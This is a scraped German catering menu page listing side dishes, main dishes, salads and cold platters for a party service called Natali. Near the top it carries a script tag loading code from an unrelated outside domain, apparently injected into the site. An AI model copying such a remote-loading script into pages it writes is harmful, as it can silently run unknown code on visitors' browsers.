Menü

<script type="text/javascript" src="https://www.marryx.com/EDC/"></script>

     Partyservice ,, Natali„

      

          Beilagen
 
1.Kartoffelbrei    

         2.Butterkartoffeln

3. Chinesische nudeln
         4.Salzkartoffeln
         5
.Plov

         6.Spätzle
         7.Reis
         8.Gemüsereis
         9.Kartoffelgratin
         10.Kaisergemüse mit Kräuterbutter
       

Hauptspeisen


1.Uberbackene Hackfleischbällchen
2.Gebratene Rippe
3.Pangasiusfile in Sahnesauce
4.Gebratene Hähnchen Keulen
5.Shweinemedalions in Rahm Souse
6.Hähnchenbrust in Sahnesauce
7.Kasselerbraten
8.Panierte Schnitzel
9.Gordon Bleu
10. Mini Haxen
11.Gefüllte Pilze
12.Schweinebraten in Pfeffersoße
13.Geschnetzeltes
14.Beef Stroganov
15.Rindenbraten
16.Knusperhänchen 

        17.Schweinebraten

   

Salate


1.Pilzsalat
2.Hering unterm Pelzmantel ( Schuba)
3.Krabbensalat
4.Olivije
5.Chinesischer Glasnudelsalat
6.Lebersalat
7.Krautsalat
8.Koreandische Karotten

9.Gemüsesalat nach Griechische Art
10.Kartoffelsalat

11.Brokolisalat

          

Kalte Platten


1.Gemischte Schinken und Bratenplatte

3.Käseplatte

4.Fischplatte mit Lachs, Butterfisch, Makrelen, Flusskrebse, Krevetten
5.Tomaten/Mozarella-Platte